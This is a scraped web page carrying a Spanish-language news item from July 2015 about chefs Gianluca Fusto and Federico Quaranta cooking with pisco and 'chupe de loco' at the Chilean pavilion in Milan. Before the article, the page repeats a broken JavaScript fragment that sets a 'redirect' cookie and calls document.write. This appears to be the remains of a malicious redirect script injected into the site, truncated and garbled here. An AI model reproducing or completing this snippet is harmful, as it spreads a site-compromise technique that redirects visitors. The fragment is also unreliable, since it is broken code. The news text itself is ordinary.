=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />

Noticias

Chef Italiano Gianluca Fusto Visita el pabellón

1 Jul 2015

Compartir:

Milán, 1 de Julio

El programa matutino “Mezzogiorno Italiano” del canal Rai TV grabó esta mañana un programa  de cocina con el prestigioso pastelero Gianluca Fusto, quién junto a Tomás Saldivia prepararon un delicioso postre donde el ingrediente principal fue el pisco Waqar, acompañado de crema, mango, coco, limón, avellanas y galletas.

“Quise preparar el postre con uno de los ingredientes que más me gusta desde que descubrí la cultura chilena. El pisco no es solo alcohol, es muy perfumado y tiene mucho sabor, es muy fresco. La idea fue mezclarlo con el coco y resultó una mezcla perfecta”, sostuvo Gianluca Fusto.

Además, el famoso chef explicó que “El pabellón es muy interesante porque pone el valor al territorio del país. Tenemos que conocer mejor la cultura chilena porque es fantástica y el pisco tiene muchos componentes que no es fácil de encontrar en un licor”.

Por otra parte el presentador del programa, Federico Quaranta, ayudó a cocinar el tradicional “Chupe de loco” junto a Tomás Saldivia, chef ejecutivo de El Amor de Chile, quienes frente a una veintena de personas explicaron las características únicas del famoso molusco.

“Más que el plato en sí, que es buenísimo, me gustó mucho el respeto que Chile está teniendo para salvaguardar su biodiversidad en el mar. Yo no sabía nada del loco, ahora sé que Chile está haciendo una buena política frente a estos temas”, dijo Quaranta.

“El pabellón comunica muy bien el estilo, a mí me encanta el pueblo chileno, porque tiene orgullo, orgullo de ser chileno. Los chilenos son cálidos”, indicó Federico Quaranta.

El programa  “Mezzogiorno Italiano” tiene una gran audiencia diaria y se presenta de lunes a viernes  de las 11.30 horas a las 12.30 hrs en el canal italiano RAI TV.

 

Partners

Media Partner